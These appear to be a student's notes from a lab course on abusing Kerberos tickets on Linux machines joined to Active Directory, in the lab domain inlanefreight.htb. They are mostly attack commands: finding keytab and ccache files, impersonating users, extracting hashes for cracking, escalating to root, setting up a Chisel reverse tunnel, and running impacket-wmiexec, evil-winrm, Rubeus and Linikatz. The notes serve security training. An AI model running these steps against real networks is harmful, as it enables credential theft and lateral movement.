A Linux computer connected to Active Directory commonly uses Kerberos as authentication.
A Linux machine not connected to Active Directory could use Kerberos tickets in scripts or to authenticate to the network. It is not a requirement to be joined to the domain to use Kerberos tickets from a Linux machine.
Kerberos on Linux
Linux machines store Kerberos tickets as ccache files in the /tmp directory
Location of the Kerberos ticket is stored in the environment variable : KRB5CCNAME
ccache files are protected by reading and write permissions, but a user with elevated privileges or root privileges could easily gain access to these tickets.
Another everyday use of Kerberos in Linux is with keytab files
A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password. However, when you change your password, you must recreate all your keytab files.
Keytab files commonly allow scripts to authenticate automatically using Kerberos without requiring human interaction or access to a password stored in a plain text file
Scenario
LINUX01 ←> MS01 ←> PWNBOX
Linux Auth from MS01 Image
Linux Auth via Port Forward
ssh david@inlanefreight.htb@10.129.204.23 -p 2222Identifying Linux and Active Directory Integration
Linux machine is domain joined using realm, a tool used to manage system enrollment in a domain and set which domain users or groups are allowed to access the local system resources.
realm - Check If Linux Machine is Domain Joined
realm listsssd or winbind identify if it is domain joined. We can read this blog post for more details.
PS - Check if Linux Machine is Domain Joined
ps -ef | grep -i "winbind\|sssd"Finding Kerberos Tickets in Linux
Finding Keytab Files
Using Find to Search for Files with Keytab in the Name
find / -name *keytab* -ls 2>/dev/nullIdentifying Keytab Files in Cronjobs
keytab files is in automated scripts configured using a cronjob or any other Linux service.
crontab -l*5/ * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt- kinit allows interaction with Kerberos, and its function is to request the user’s TGT and store this ticket in the cache (ccache file). We can use
kinitto import akeytabinto our session and act as the user.
Finding ccache Files
A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user’s session lasts
Reviewing Environment Variables for ccache Files.
env | grep -i krb5Searching for ccache Files in /tmp
ls -la /tmpAbusing KeyTab Files
Listing keytab File Information
klist -k -t /opt/specialfiles/carlos.keytab Impersonating a User with a keytab
klist kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytabConnecting to SMB Share as Carlos
smbclient //dc01/carlos -k -c lsKeytab Extract
We can attempt to crack the account’s password by extracting the hashes from the keytab file. Let’s use KeyTabExtract, a tool to extract valuable information from 502-type .keytab files, which may be used to authenticate Linux boxes to Kerberos.
information such as the realm, Service Principal, Encryption Type, and Hashes.
Extracting Keytab Hashes with KeyTabExtract
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab With the NTLM hash, we can perform a Pass the Hash attack. With the AES256 or AES128 hash, we can forge our tickets using Rubeus or attempt to crack the hashes to obtain the plaintext password.
quick way to decrypt passwords is with online repositories such as https://crackstation.net/, which contains billions of passwords.
Log in as Carlos
su - carlos@inlanefreight.htbThen obtain more hashes.
Abusing Keytab ccache
Privilege Escalation to Root
ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222sudo suLooking for ccache Files
ls -la /tmpIdentifying Group Membership with the id Command
id julio@inlanefreight.htbImporting the ccache File into our Current Session
klistcp /tmp/krb5cc_647401106_I8I133 . export KRB5CCNAME=/root/krb5cc_647401106_I8I133klistsmbclient //dc01/C$ -k -c ls -no-passUsing Linux Attack Tools with Kerberos
our attack host doesn’t have a connection to the KDC/Domain Controller, and we can’t use the Domain Controller for name resolution. To use Kerberos, we need to proxy our traffic via MS01 with a tool such as Chisel and Proxychains and edit the /etc/hosts file to hardcode IP addresses of the domain and the machines we want to attack.
Host File Modified
cat /etc/hosts
# Host addresses
172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01Proxychains Configuration File
cat /etc/proxychains.conf
<SNIP>
[ProxyList]
socks5 127.0.0.1 1080Download Chisel to our Attack Host
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gzgzip -d chisel_1.7.7_linux_amd64.gz mv chisel_* chisel && chmod +x ./chiselsudo ./chisel server --reverseConnect to MS01 with xfreerdp
xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolutionExecute chisel from MS01
c:\tools\chisel.exe client 10.10.14.33:8080 R:socksSetting the KRB5CCNAME Environment Variable
export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133Impacket
Using Impacket with proxychains and Kerberos Authentication
proxychains impacket-wmiexec dc01 -kEvil-Winrm
Installing Kerberos Authentication Package
sudo apt-get install krb5-user -yDefault Kerberos Version 5 realm
Default Kerberos Version 5 realm
Kerberos Configuration File for INLANEFREIGHT.HTB
cat /etc/krb5.conf
[libdefaults]
default_realm = INLANEFREIGHT.HTB
<SNIP>
[realms]
INLANEFREIGHT.HTB = {
kdc = dc01.inlanefreight.htb
}
<SNIP>Using Evil-WinRM with Kerberos
proxychains evil-winrm -i dc01 -r inlanefreight.htbMiscellaneous
If we want to use a ccache file in Windows or a kirbi file in a Linux machine, we can use impacket-ticketConverter to convert them
Impacket Ticket Converter
impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbiNote: We can do the reverse operation by first selecting a .kirbi file
Importing Converted Ticket into Windows Session with Rubeus
C:\tools\Rubeus.exe ptt /ticket:c:\tools\julio.kirbiLinikatz
Linikatz is a tool created by Cisco’s security team for exploiting credentials on Linux machines when there is an integration with Active Directory.
Mimikatzto UNIX environments.- root required
This tool will extract all credentials, including Kerberos tickets, from different Kerberos implementations such as FreeIPA, SSSD, Samba, Vintella, etc. Once it extracts the credentials, it places them in a folder whose name starts with
linikatz
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh/opt/linikatz.sh